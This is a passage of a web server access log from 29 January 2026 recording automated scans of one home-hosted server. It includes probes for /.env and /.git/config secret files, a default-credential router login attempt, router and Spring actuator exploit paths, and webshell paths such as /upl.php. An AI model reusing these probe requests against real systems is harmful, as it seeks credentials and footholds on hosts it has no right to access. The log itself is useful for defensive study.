(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36" "-" +[29/Jan/2026:10:27:22 +0000] 400 - GET http 91.82.215.191 "/" [Client 92.63.197.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[29/Jan/2026:10:34:20 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:10:34:25 +0000] 400 - - http localhost "-" [Client 172.212.200.195] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:10:34:25 +0000] 400 - - http localhost "-" [Client 172.212.200.195] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:10:47:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:10:57:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:11:01:36 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 156.146.135.21] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-json/wc/v3" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/magento_version" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/index.php?route=checkout/cart" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/index.php?route=account/register" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:36 +0000] 404 - GET http profibot.direct.quickconnect.to "/index.php?route=account/login" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/index.php?route=checkout/checkout" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin/" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:01:37 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-json/" [Client 156.146.135.21] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[29/Jan/2026:11:22:03 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[29/Jan/2026:11:25:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:11:39:12 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:11:40:19 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:11:41:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:11:49:10 +0000] 200 - GET http 91.82.215.191 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[29/Jan/2026:11:49:10 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/sqlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/sqlitemanager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/SQLite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/SQLiteManager-1.2.4/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:49:10 +0000] 404 - GET http 91.82.215.191 "/agSearch/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://91.82.215.191/" +[29/Jan/2026:11:53:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[29/Jan/2026:11:59:31 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:12:01:46 +0000] 200 - GET http 91.82.215.191 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[29/Jan/2026:12:05:11 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:12:11:55 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:12:24:44 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:12:25:49 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:12:31:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:12:44:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 123.6.49.36] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:12:44:06 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 123.6.49.14] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[29/Jan/2026:12:44:26 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:12:44:27 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 123.6.49.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:44:30 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 123.6.49.42] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:44:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:12:44:32 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/config.json" [Client 123.6.49.38] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:51:45 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 123.6.49.36] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[29/Jan/2026:12:51:46 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 123.6.49.38] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:51:49 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 123.6.49.49] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:51:49 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 123.6.49.10] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:12:53:41 +0000] 400 - GET http 91.82.215.191 "/" [Client 206.168.34.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:12:53:43 +0000] 400 - - http localhost "-" [Client 206.168.34.43] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:12:54:03 +0000] 400 - GET http 91.82.215.191 "/.well-known/security.txt" [Client 206.168.34.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:12:58:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 20.168.127.122] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:13:02:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 1.192.192.8] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:13:02:40 +0000] 200 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 1.192.192.4] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[29/Jan/2026:13:02:59 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:13:03:02 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 1.192.195.5] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:03:03 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 1.192.195.11] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:03:04 +0000] 404 - GET http 91-82-215-191.pool.digikabel.hu "/config.json" [Client 1.192.195.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:05:05 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/" [Client 1.192.195.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[29/Jan/2026:13:05:07 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/favicon.ico" [Client 1.192.195.11] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:05:07 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/robots.txt" [Client 1.192.195.11] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:05:08 +0000] 400 - GET http 91-82-215-191.pool.digikabel.hu "/sitemap.xml" [Client 1.192.195.8] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:13:07:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:13:13:49 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:13:15:26 +0000] 400 - GET http 91.82.215.191 "/.env" [Client 157.245.98.43] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[29/Jan/2026:13:15:27 +0000] 400 - GET http 91.82.215.191 "/.git/config" [Client 157.245.98.43] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[29/Jan/2026:13:15:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:13:20:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:13:24:32 +0000] 404 - GET http 91.82.215.191 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[29/Jan/2026:13:42:30 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.91] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:13:42:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.91] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:13:53:53 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:14:00:55 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:14:02:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.248.207.191] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:14:02:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.248.207.191] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:14:02:23 +0000] 200 - GET http 91.82.215.191 "/" [Client 104.248.207.191] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:02:23 +0000] 404 - GET http 91.82.215.191 "/form.html" [Client 104.248.207.191] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[29/Jan/2026:14:02:23 +0000] 404 - GET http 91.82.215.191 "/upl.php" [Client 104.248.207.191] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[29/Jan/2026:14:02:24 +0000] 404 - GET http 91.82.215.191 "/t4" [Client 104.248.207.191] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[29/Jan/2026:14:02:24 +0000] 404 - GET http 91.82.215.191 "/geoip/" [Client 104.248.207.191] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:02:24 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[29/Jan/2026:14:02:24 +0000] 404 - GET http 91.82.215.191 "/1.php" [Client 104.248.207.191] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:02:24 +0000] 404 - GET http 91.82.215.191 "/systembc/password.php" [Client 104.248.207.191] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:02:25 +0000] 404 - GET http 91.82.215.191 "/password.php" [Client 104.248.207.191] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:08:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 45.194.92.199] [Length 1033] [Gzip -] "Hello World" "-" +[29/Jan/2026:14:13:48 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:14:14:02 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:14:22:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:14:29:38 +0000] 404 - GET http 91.82.215.191 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:14:31:14 +0000] 400 - GET http 91.82.215.191 "/" [Client 203.55.131.3] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:31:37 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 182.116.34.153] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:14:40:44 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 78.29.51.27] [Length 1033] [Gzip -] "ATTENTION! FREE! NEW BLOCKCHAIN SEARCH ENGINE! BASE 200 MLN DOMAINS! OWN HOSTING! LINK - http://78.29.51.27/searchdomain/?s1=CU_profibot.direct.quickconnect.to" "http://78.29.51.27/searchdomain/?s1=CU_profibot.direct.quickconnect.to" +[29/Jan/2026:14:41:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[29/Jan/2026:14:47:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:14:49:24 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:14:53:16 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.68.242.107] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[29/Jan/2026:14:54:16 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:14:57:20 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:14:58:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:14:59:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:06:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:06:30 +0000] 400 - - http localhost "-" [Client 20.121.46.26] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:15:17:21 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 89.42.231.200] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:15:17:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:24:18 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:28:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:15:46:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:15:48:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:53:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:54:52 +0000] 404 - GET http 91.82.215.191 "/admin/config.php" [Client 102.22.20.125] [Length 150] [Gzip -] "xfa1,nvdorz,nvd0rz" "-" +[29/Jan/2026:15:54:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:15:58:37 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 